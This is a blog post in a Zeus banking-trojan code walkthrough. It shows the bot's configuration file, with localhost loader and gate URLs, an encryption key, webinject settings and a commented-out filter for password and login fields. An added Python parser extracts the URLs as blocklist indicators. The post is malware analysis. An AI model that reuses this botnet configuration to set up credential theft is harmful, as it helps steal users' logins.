Irregular Expressions

Jun 11 2011   11:20PM GMT

Zeus code walkthrough – Part 5

Dan O'Connor

Now that my bot is built, it's worth looking at what the basic config file looks like.

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
  entry "WebFilters"
  entry "WebDataFilters"
    ;"*" "passw;login"
  entry "WebFakes"
    ;"" "" "GP" "" ""

At this point we know what the encryption key, url_config, url_loader and url_server are. The rest will have to be traced back in the source code when we get there.

I am very interested in the WebFakes listing.
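
As an added example (not code from this post or from Zeus itself), here is a small Python parser for a config laid out like the one above. It pulls the url_* values out as network indicators for blocklists or proxy-log searches. It assumes nesting follows indentation and that a leading ';' comments a line out; parse_config and network_indicators are hypothetical names.

```python
import shlex
from urllib.parse import urlparse

# Constructed sample in the layout shown in the post (localhost placeholders only).
SAMPLE = '''\
entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  url_config "http://localhost/config.bin"
  encryption_key "secret key"
entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  entry "WebDataFilters"
    ;"*" "passw;login"
'''

def parse_config(text):
    """Return {entry path: {key: [values]}}; nesting is inferred from indentation (assumption)."""
    entries, stack = {}, []          # stack holds (indent, entry name)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # assumption: leading ';' comments a line out
            continue
        indent = len(raw) - len(raw.lstrip())
        tokens = shlex.split(line)             # keeps double-quoted values with spaces intact
        while stack and stack[-1][0] >= indent:
            stack.pop()                        # leave entries at the same or deeper indent
        if tokens[0] == "entry":
            stack.append((indent, tokens[1]))
            entries["/".join(n for _, n in stack)] = {}
        else:
            path = "/".join(n for _, n in stack)
            entries.setdefault(path, {})[tokens[0]] = tokens[1:]
    return entries

def network_indicators(entries):
    """Collect every url_* setting as (entry path, key, host, URL path)."""
    out = []
    for path, settings in entries.items():
        for key, values in settings.items():
            if key.startswith("url_") and values:
                u = urlparse(values[0])
                out.append((path, key, u.hostname, u.path))
    return out

if __name__ == "__main__":
    for row in network_indicators(parse_config(SAMPLE)):
        print(row)
```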
